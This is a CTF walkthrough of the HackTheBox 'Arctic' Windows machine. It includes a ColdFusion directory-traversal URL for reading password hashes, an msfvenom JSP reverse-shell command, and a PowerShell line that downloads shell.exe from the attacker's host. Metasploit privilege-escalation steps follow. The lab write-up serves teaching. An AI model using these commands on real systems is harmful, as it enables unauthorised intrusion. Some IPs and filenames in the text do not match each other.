HackTheBox / InfoSec / CTF

HackTheBox | Arctic Walkthrough

. 6 min read . Written by Nautilus
HackTheBox | Arctic Walkthrough

Arctic is a pretty easy machine to exploit. To achieve user.txt and root.txt this machine requires some basic enumeration, discovery, and exploitation skills.

user.txt

Let's start off with a basic nmap scan:

nmap -sC -sV 10.10.10.16
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info

After browsing to 10.10.10.11:8500 we are shown the following:

After browsing to CFIDE/ we find some more goodies:

Let's try browsing to administrator/ to see if there's a panel:

As we can see we're presented with a "ColdFusion Administrator Login" - Let's Google exploits for ColdFusion 8:

The first exploit we find is a Directory Traversal exploit. Let's look into that and see what's going on:

After further inspection it looks like we only need to modify the URL a little. This means our URL should be the following:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Let's submit this request and see what happens:

Looks like we have a password hash - let's throw this into Google and see if we get any results:

Clicking on the first link revealed that it's an sha1 hash and the decrypted output is the password happyday. Since we know the username is admin our working credentials should be:

admin:happyday

Let's try these credentials and see if our login is successful:

Looks like we logged in successfully to the administrator panel. The first place I checked upon logging in was "Mappings" to be presented with the following information which will come in handy later:

After looking around for a little I found something interesting in Debugging & Logging. It seems that we are able to grab a file from a URL and execute it as a scheduled task:

Let's create a shell, host it via a SimpleHTTPServer and see if it pops.

To begin this attack method we're going to create a Javascript payload in msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

Now that's generated let's host it with a SimpleHTTPServer:

Now we need to set up a handler in Metasploit:

As we saw from the directory paths earlier we should be able to save our file to:

C:\ColdFusion8\wwwroot\CFIDE\example.jsp

Now let's submit our task and see if we get confirmation of our shell being grabbed from the SimpleHTTPServer:

Great! Now let's browse to our file and see if our handler grabs it:

http://10.10.10.11:8500/CFIDE/example.jsp

After browsing to C:\Users\tolis\Desktop we find the user.txt flag:

root.txt

We're currently logged into the system as "tolis". However, we want to get logged on as Authority since this is a Windows box. Let's first upgrade our shell to a Meterpreter shell. We're going to do this in the same way that we got a shell onto the machine with a SimpleHTTPServer, except this time we're going to call it from Powershell.

To begin, let's create a windows reverse_tcp shell with msfvenom:

Now that we've created and hosted the shell let's set up our handler:

Now let's call the script from our SimpleHTTPServer using Powershell on the target machine:

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.23/shell.exe', 'juicyshell.exe')"

As we can see "juicyshell.exe" has been created in the directory. Now we just need to run it which can be accomplish with the following command:

powershell start-process juicy.exe

After starting the process we get our Meterpreter session:

After starting interaction with our session we're going to run local_exploit_suggester to see if we can find some vulns:

run post/multi/recon/local_exploit_suggester

Great! It looks like we have a lot of exploits to choose from. Let's start from the top with exploit/windows/local/bypassuac_eventvwr:

No luck with this exploit. Let's move onto exploit/windows/local/ms10_092_schelevator:

So the exploit was aborted because we're not using an x64 Meterpreter.. Let's migrate into an x64 process to fix the issue:

From listing running processes we find quite a few x64 processes. Let's migrate into conhost.exe:

Success! Now let's try running the exploit again:

Now let's check if we've successfully escalated our privileges:

Great! Now let's go grab the root flag to finish off the box:

Final Thoughts

I really enjoyed obtaining both flags on this box. I'm much more comfortable in a Linux environment but I learn more about Powershell in the command line every time I work on a Windows box. For example - I kept on trying to start my commands with "PS" rather than "Powershell". A small error, but one that can be diagnosed quickly and remedied painlessly.

I'd recommend this box to anyone who's looking to learn a little about Windows machines - it was certainly a fun and interactive path to own root!

Thanks for reading, I hope you learned something new from this machine!